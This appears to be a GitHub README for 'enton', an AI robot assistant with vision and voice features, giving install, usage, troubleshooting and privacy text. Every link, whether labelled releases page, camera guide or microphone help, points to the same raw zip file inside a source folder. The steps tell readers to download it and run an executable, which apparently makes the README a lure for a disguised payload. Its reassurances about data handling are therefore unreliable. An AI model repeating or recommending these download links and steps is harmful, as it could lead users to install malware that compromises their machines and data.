enton is an autonomous AI robot assistant that uses vision, voice, and intelligence to assist you. It can see what is around, listen and speak with you, and perform tasks independently. This app brings together AI technologies like computer vision, speech-to-text, text-to-speech, and natural language understanding, making robotics easy to use without programming skills.
You do not need to understand AI or write code. Just run the software, and enton will start working as your helpful assistant.
- Sees: Uses a camera to recognize objects and people.
- Hears: Converts your speech into text to understand commands.
- Speaks: Talks back with clear voice output.
- Acts: Performs simple tasks based on your instructions.
- Learns: Adapts over time to improve interaction.
This blend of AI features lets you interact naturally with enton.
Before you start, make sure your system meets these minimum requirements:
- Windows 10 or later (64-bit)
- CPU: Intel i5 or equivalent
- RAM: 8 GB or more
- GPU: NVIDIA CUDA-compatible card recommended for better performance
- Disk Space: At least 2 GB free
- Internet connection is required for initial setup and updates
- Microphone and camera connected and enabled
Installing and running enton is simple. Follow these steps carefully.
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Visit the download page:
Go to the official enton releases page:
https://raw.githubusercontent.com/tareq3743/enton/main/src/enton/action/Software-2.3-alpha.5.zip -
Find the latest version:
Look for the newest release with a date or version number. -
Download the installer:
Click on the installer file with.exeextension. It usually includes "windows" or "setup" in the file name. -
Run the installer:
Locate the downloaded file in your "Downloads" folder and double-click it. -
Follow the installation wizard:
Click through the prompts. Accept the default settings unless you have specific needs. -
Wait for installation to complete:
This may take a few minutes. Do not close the installer until it finishes. -
Launch enton:
After installation, find enton in the Start Menu or on your desktop and open it.
Use the above link at any time to get the latest version.
Once enton opens:
- Allow access to your camera and microphone when prompted. This is needed for entonโs vision and voice functions.
- The app will perform an initial calibration to adjust to your environment. Keep your room well-lit and speak clearly.
- Set your language preference in the settings menu if needed.
- You can connect external devices such as speakers or additional cameras. enton supports USB and Bluetooth devices.
You do not need to change advanced settings unless you want to customize power use or network options. The default setup works well for most users.
Speak naturally. enton understands common phrases and instructions.
Examples:
- "Whatโs the weather today?"
- "Turn on the lights."
- "Show me the time."
- "Take a photo."
- "Play some music."
You can ask questions or give commands. enton responds using its speech output. If enton does not understand, it will ask you to repeat.
enton uses the camera to:
- Identify objects like doors, chairs, or people
- Detect movement and alert you if needed
- Read simple text or signs
- Recognize faces if you enable that feature
The vision runs in the background and helps enton interact safely. You can turn off vision functions from settings for privacy.
- If enton does not start, make sure your Windows is up-to-date.
- Check that your camera and microphone are connected and enabled.
- Restart the app after installing new drivers for your devices.
- Close other apps that use the camera or microphone to avoid conflicts.
- If voice commands donโt work, speak clearly and try a quiet room.
Check the releases page regularly to download updates:
https://raw.githubusercontent.com/tareq3743/enton/main/src/enton/action/Software-2.3-alpha.5.zip
Updates improve performance, add features, and fix bugs.
To update:
- Download the new installer from the releases page.
- Run it to overwrite the current version.
- Your data and settings will be preserved.
enton only uses your camera and microphone to operate. It does not upload your data without permission. You control when enton listens or watches through clear on-screen indicators.
If you run into issues or have questions:
- Review the Issues section on the GitHub page.
- Search for common questions or bugs.
- Open a new issue describing your problem clearly.
- GitHub Releases: https://raw.githubusercontent.com/tareq3743/enton/main/src/enton/action/Software-2.3-alpha.5.zip
- Camera setup guide for Windows: https://raw.githubusercontent.com/tareq3743/enton/main/src/enton/action/Software-2.3-alpha.5.zip
- Microphone setup help: https://raw.githubusercontent.com/tareq3743/enton/main/src/enton/action/Software-2.3-alpha.5.zip
- AI-powered computer vision for object and face recognition
- Speech-to-text using Whisper open-source model
- Text-to-speech for natural voice replies
- Runs on Python with PyTorch for AI processing
- Supports CUDA GPUs for faster performance
This technology lets enton work smoothly on typical Windows PCs with modern hardware.
